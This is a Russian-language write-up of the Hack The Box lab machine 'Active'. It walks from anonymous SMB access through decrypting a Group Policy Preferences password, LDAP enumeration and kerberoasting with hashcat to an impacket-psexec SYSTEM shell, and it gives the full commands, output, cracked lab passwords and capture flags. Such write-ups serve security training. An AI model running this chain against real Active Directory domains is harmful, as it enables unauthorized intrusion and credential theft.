Обзор сервисов
Проведем стандартную разведку машины с IP-адресом 10.10.10.100 с помощью nmap:
$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.10.100 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 13:31 EDT
Nmap scan report for 10.10.10.100
Host is up (0.11s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-11 17:38:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-11T17:39:59
|_ start_date: 2023-08-11T06:18:16
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 533.77 seconds
Samba
На машине развернуты Active Directory и Samba. Посмотрим, что можем найти в сетевых папках:
$ smbclient -L //10.10.10.100
Password for [WORKGROUP\user]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Открыт анонимный доступ! Посмотрим в папку Replication.
$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\user]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277843 blocks available
Скачаем все файлы для локального исследования.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (4.6 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.8 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (2.8 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (8.4 KiloBytes/sec) (average 2.1 KiloBytes/sec)
Это очень похоже на резервную копию групповых политик. Проверим:
$ find . -iname *group*
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
Посмотрим на все файлы и в одном из файлов найдем учетку active.htb\SVC_TGS и ее зашифрованный пароль.
$ cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Расшифруем пароль с помощью gpp-decrypt:
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
На этом этапе мы имеем креды: active.htb\SVC_TGS:GPPstillStandingStrong2k18
Мы можем попробовать посмотреть, что нам доступно с ними, но не встречаем ничего интересного.
$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
LDAP
С помощью ldapsearch и полученной сервисной учетки мы можем сделать запросы к LDAP и посмотреть имена других учетных записей и групп.
$ ldapsearch -x -H ldap://10.10.10.100 -D "SVC_TGS" -w "GPPstillStandingStrong2k18" -b "dc=active,dc=htb" | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Print Operators
sAMAccountName: Backup Operators
sAMAccountName: Replicator
sAMAccountName: Remote Desktop Users
sAMAccountName: Network Configuration Operators
sAMAccountName: Performance Monitor Users
sAMAccountName: Performance Log Users
sAMAccountName: Distributed COM Users
sAMAccountName: IIS_IUSRS
sAMAccountName: Cryptographic Operators
sAMAccountName: Event Log Readers
sAMAccountName: Certificate Service DCOM Access
sAMAccountName: DC$
sAMAccountName: krbtgt
sAMAccountName: Domain Computers
sAMAccountName: Domain Controllers
sAMAccountName: Schema Admins
sAMAccountName: Enterprise Admins
sAMAccountName: Cert Publishers
sAMAccountName: Domain Admins
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Server Operators
sAMAccountName: Account Operators
sAMAccountName: Pre-Windows 2000 Compatible Access
sAMAccountName: Incoming Forest Trust Builders
sAMAccountName: Windows Authorization Access Group
sAMAccountName: Terminal Server License Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Read-only Domain Controllers
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: SVC_TGS
sAMAccountName: ian
Проверим с помощью impacket-GetADUsers только существующие учетные записи.
$ GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Administrator 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
Guest <never> <never>
krbtgt 2018-07-18 14:50:36.972031 <never>
SVC_TGS 2018-07-18 16:14:38.402764 2018-07-21 10:01:30.320277
Kerberoasting
Попробуем применить технику kerberoasting. Идея в том, что мы получили креды пользователя, то есть у нас есть ticket-granting ticket (TGT), прохешированный на нашем пароле. Мы можем запросить с его помощью ticket-granting service (TGS) для любого Service Principal Name (SPN) на контроллере домена. Часть TGS прохеширована на пароле учетки этого SPN, поэтому наша задача - заставить контроллер домена выписать нам такой TGS, чтобы мы могли его брутфорсить на локальной машине.
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-11 06:13:32.092026
[-] CCache file is not found. Skipping…
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7ff0963664e13f288f1b32e80163cf2a$ddf6423a41e103f75d1371db2465e68627e248890e00d86e5cef618743f42c68d426c5659514b6bcf62f4236ea3ea56eb13c5747c62b16e07334eea9aa1f855289392182b477130d4a4f535070bfc4115ef285269b86116c204f9a7be8326bc971851c1a066aea1f6e53b03cdd42469d98d3c6a3b90cd519c9ff354ac34de91f031672a464ab5e0ba956ea7cedc7b45478641488db40705354b1a530efda8467277b02bc0c468f017b70d90f72245fd5309746a3c2fb7d4370dd9f34a516435b5cff0b6496684bd5383cea425eec7a3b734733ec194134ddb5d68a30cce612a3d6f09c7e3589e6bf3dbd4d4bf4c741f457a8e527f3683f0e372204e6c787b368b8e29db98bb64af3f7cdb863b10bd95812d9149bb818c36ae7ea9b85510d915428d7aedd9b5e3faf14e159b60259a9f0f9c79ef0056698ce7abeef40218a7bc848d6fa2051696a38157320f005032c579c3c8ca438cc0ef04c6d0514fab9e6bf19aa807f52dd2ce0b29cd1bc331586199ce6a2d47b0b86e2cf3febf41741defc28edfbfb75160834aa48893d18ba2dbe511cb6f59b629c0a5a4f964bdae9837fee126741a867e162c5df8ff9d52875962a31324317afd0102ec4fc0cdf9353b782607dd5f7e7f7945b34e56c0cd96c959ee628e9d0a6476e9d44b47baed74b864b06c7fda61c18107c4bf9125ffebdf64662eaaf9f82aae51aefe32e2e5912083565db38537f77837759110d650a2d3011496c23c0992f24273271ec987f76dadc81efdf00fa6419fac54d28a2aeb907c4188a13fa61035e00e5c7def6713f18baad9d69fb3369b04b26223dba67a98b47942caf3d9ce5ff3fe3cea876a8cc228f9508a2c4a7174f10b54047f806b7631c46f2ccde061614161c6473d41d02867904983c493c3a92bf0264bb675b9a733e058b77a971bb18e4a952a79608d14ae730f6820426189df79cbb71f9c3a15674371c7f2afa1e91ce40c948db9c8d9a45a34ae322cd81f55cb726c349e4620ae66d9e4e92223718ab8c78c99bc87c9636b1fd5aa1574850e1e8ba53726df0250bf95035cf6e7b08051bf886ebb64f72c46557d79465e8f0334145d76e88e1e7044b13cd06cc22492d9ca4d711a1960a5939503b607326be316dd58a384db5b87592bb35535fbe0c97f88f917b77a6d0eb74a64382b706f1f7869ac9c19a1e2f326ae6a7b976d3cb817d56286a0b7b28e9b58417190441ad2727a0f179f85b5a52dc6ac85ba6448d169b
Сохраним полученный TGS в файл hash.txt и запустим брутфорс.
$ hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
...
Ticketmaster1968
Таким образом, мы получили пароль от учетной записи Administrator:Ticketmaster1968. Теперь мы можем залогиниться с помощью psexec.
$ impacket-psexec active.htb/Administrator:[email protected] cmd.exe
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file TnrxlohI.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service zvhj on 10.10.10.100…..
[*] Starting service zvhj…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Флаг пользователя
> cd Desktop
> type user.txt
7f1870ed9b70adf9dc2c170f33fe79d2
Флаг суперпользователя
> cd \users\administrator\desktop
> type root.txt
f353ae06c7c90141bf760e8d1e03ce4e
